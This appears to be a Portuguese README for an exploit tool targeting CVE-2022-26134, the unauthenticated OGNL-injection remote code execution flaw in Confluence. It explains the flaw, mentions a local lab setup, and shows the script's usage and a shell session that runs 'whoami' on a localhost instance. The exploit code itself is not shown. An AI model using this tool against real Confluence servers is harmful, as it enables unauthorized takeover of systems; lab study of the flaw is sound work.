
Exploit para CVE-2022-26134: Execução Remota de Código sem Autenticação Prévia no Confluence via Injeção OGNL
Outro exploit na Terra OGNL
Confluence é uma wiki corporativa baseada na web desenvolvida pela empresa australiana de software Atlassian.
Em 02 de junho de 2022, a Atlassian publicou um aviso de segurança para seus aplicativos Confluence Server e Data Center, destacando uma vulnerabilidade crítica de execução remota de código não autenticada. A vulnerabilidade de injeção OGNL permite que um usuário não autenticado execute código arbitrário em uma instância do Confluence Server ou Data Center.
Para configurar seu laboratório, execute start_conflunce.sh e siga as instruções fornecidas aqui.
$ ./confluence-exploit.py
usage: confluence-exploit.py [-h] -u URL
confluence-exploit.py: error: the following arguments are required: -u/--url
$ ./confluence-exploit.py -u http://127.0.0.1:8090
🔗 URL: http://127.0.0.1:8090
👉 (id): whoami
confluence